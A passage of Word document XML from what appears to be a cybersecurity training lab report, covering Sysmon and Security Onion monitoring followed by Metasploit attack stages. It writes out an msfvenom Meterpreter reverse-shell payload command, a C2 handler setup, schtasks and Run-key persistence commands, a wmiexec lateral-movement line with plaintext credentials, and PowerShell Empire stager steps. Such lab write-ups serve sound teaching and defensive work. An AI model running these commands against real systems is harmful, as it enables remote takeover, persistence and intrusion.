                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>sysmon64.exe -accepteula -i sysmonconfig.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08143B7A" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Once operational, all critical host actions—including process spawn sequences (Event ID 1), raw network sockets (Event ID 3), and runtime registry alterations—were indexed within Applications and Services Logs -&gt; Microsoft -&gt; Windows -&gt; Sysmon -&gt; Operational.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3A6781" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>7.2 Network Trapping with Security Onion Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C4CFC" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00D4209A" w:rsidP="00266179">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>At the network layer, Security Onion was engineered as a standalone monitoring instance. By putting the network adapter into promiscuous mode, the embedded Suricata engine captured raw packets and matched them against high-severity community signature sets. This framework let the SOC analyze malicious events through an integrated administrative dashboard, tracking automated mapping patterns down to explicit packet structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1345CB83" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00266179" w:rsidP="00266179">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620EAB37" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00266179" w:rsidP="00266179">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C6E8AA" w14:textId="6A4611A5" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00266179">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>8. Multi-Stage Compromise Operations via Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D88F03" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Advanced Persistent Threats (APTs) rely on structured multi-stage operations. The training replicated these stages by utilizing the Metasploit Framework (msfconsole) to engineer, deliver, execute, and control reverse payload shells on target machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C9D183" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F323FC" w14:textId="608B4458" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Automated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>MSFVenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload Staging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB82F60" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>An executable binary payload embedding an obfuscated, multi-threaded 64-bit Meterpreter reverse TCP connection channel was generated via the terminal layout configuration:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="6CD88F9D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77FE2B85" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Generating a 64-bit multi-stage Meterpreter payload architecture</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.10 LPORT=4444 -f exe -o ~/payload.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B0A7571" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>8.2 C2 Listener Provisioning and Session Interactive Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48502E" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Concurrently, a centralized command-and-control handler listener was configured within the Metasploit console to accept multi-session callbacks without dropping the interface:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="345AA3DB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5038F6A3" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Staging the multi-session handler architecture inside msfconsole</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>use exploit/multi/handler</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>set PAYLOAD windows/x64/meterpreter/reverse_tcp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>set LHOST 192.168.56.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>set LPORT 4444</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>set ExitOnSession false</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>exploit -j</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="144CDDD4" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The generated binary executable was staged on a temporary Python HTTP server instance (python3 -m http.server 8080) on Kali and retrieved onto the Windows node. Upon administrative execution, a fully operational, high-privilege interactive Meterpreter session was instantly achieved, granting deep host manipulation access (sysinfo, shell, getuid).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B0BC97" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00266179" w:rsidP="00266179"/>
    <w:p w14:paraId="586DE187" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00266179" w:rsidP="00266179"/>
    <w:p w14:paraId="2AAA61A2" w14:textId="0A71E272" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00266179">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>9. Post-Exploitation Mechanics: Persistence &amp; Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65703B39" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Gaining access to a system is only temporary if security controls can sever the active process chain during reboot sequences. Post-exploitation requires establishing silent persistence mechanisms and mapping pathing into adjacent network nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A87F19C" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53813875" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9CDC77" w14:textId="6C4CA5CA" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>9.1 Establishing Post-Reboot Local Host Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C28425" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>To guarantee long-term control regardless of interactive system restarts, two primary post-exploitation Living-off-the-Land (LotL) persistence methods were executed within the interactive shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32543AC9" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Option A: Scheduled Task Creation: Registering an elevated system execution task tied directly to user login triggers.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="52BE74E8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="64600576" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>schtasks /create /tn "SystemUpdate" /tr "C:\path\to\payload.exe" /sc onlogon /ru System /f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F97B77A" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Option B: Hive Registry Key Alteration: Injecting an automated initialization string within the CurrentVersion Run matrix block.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="435F1DBD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A66C34D" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d "C:\path\to\payload.exe" /f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27D6E9BA" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3304C16A" w14:textId="385F7DEA" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>9.2 Lateral Movement Vector Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587CCC9C" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Once a single machine is controlled, attackers pivot laterally to compromise deeper network zones. The labs evaluated two primary lateral movement methodologies using acquired local administrative credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C252FD" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Method 1: PsExec (SMB/RPC Execution Layer): Utilizing the Metasploit windows/smb/psexec module to upload and execute a staging service on port 445 across adjacent IP nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F69757" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Method 2: Windows Management Instrumentation (WMI): Initiating command pipelines via native WMI calls or impacket-wmiexec on Kali for clean execution without writing new files to disk.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="62858AA0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3A18BFDE" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Initiating clean remote execution via Impacket WMI subroutines</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>wmiexec.py Administrator:Pass123@192.168.56.20 "whoami"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D9B2A28" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00266179">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21BF4A54" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00266179">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C11F7AE" w14:textId="24AD2709" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00266179">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>10. Fileless Malware and PowerShell Empire Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3857A3C8" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Traditional antivirus systems heavily inspect binary components saved directly to physical disk spaces. Modern penetration testing focuses on Fileless Malware frameworks that inject code directly into volatile system memory spaces, bypassing signature scanners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1532F3C5" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>11.1 PowerShell Empire and Starkiller Web Orchestration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE8450" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Trainees evaluated the PowerShell Empire post-exploitation framework and its modern graphical web interface, Starkiller. Empire specializes in generating highly obfuscated, in-memory PowerShell stagers that execute directly inside legitimate system processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE6D04C" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>1. Framework Initialization: Launching the server on Kali (powershell-empire server) and starting the Starkiller GUI interface to access the main management panels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1C848" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>2. Listener Construction: Deploying an HTTP listener named 'lab-http' bound explicitly to the Kali IP space on port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFD2F5F" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>3. Stager Generation: Creating a multi/launcher stager module that wraps a heavily encoded Base64 command inside a single execution line.</w:t>
      </w:r>
    </w:p>
